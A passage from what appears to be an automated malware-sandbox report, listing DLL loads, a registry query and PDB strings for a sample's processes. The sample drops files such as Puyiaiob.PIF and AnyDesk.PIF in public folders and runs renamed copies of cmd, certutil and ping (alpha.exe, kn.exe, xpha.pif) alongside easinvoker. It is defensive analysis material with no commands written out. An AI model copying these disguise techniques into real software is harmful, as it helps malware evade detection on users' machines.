                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sti.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\Public\xpha.pifSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\xpha.pifSection loaded: winnsi.dll
                  Source: C:\Users\Public\xpha.pifSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: apphelp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: url.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieframe.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: iertutil.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: netapi32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: wkscli.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: netutils.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: learning_tools.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winmm.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: wininet.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ????.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??????????.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ????.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: tquery.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppwmi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: slc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppcext.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winscard.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: devobj.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: cryptsp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: rsaenh.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: cryptbase.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: atlthunk.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: mmdevapi.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: devobj.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: textshaping.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: ntasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: url.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieframe.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: iertutil.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: netapi32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: wkscli.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: netutils.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: learning_tools.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winmm.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: wininet.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ????.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: tquery.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppwmi.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: slc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppcext.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: winscard.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: devobj.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: cryptsp.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: rsaenh.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: cryptbase.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dll
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dll
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dll
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
                  Source: saw.batStatic file information: File size 2921546 > 1048576
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
                  Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
                  Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
                  Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.00000000219AE000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.000000002197D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000286E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000286B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
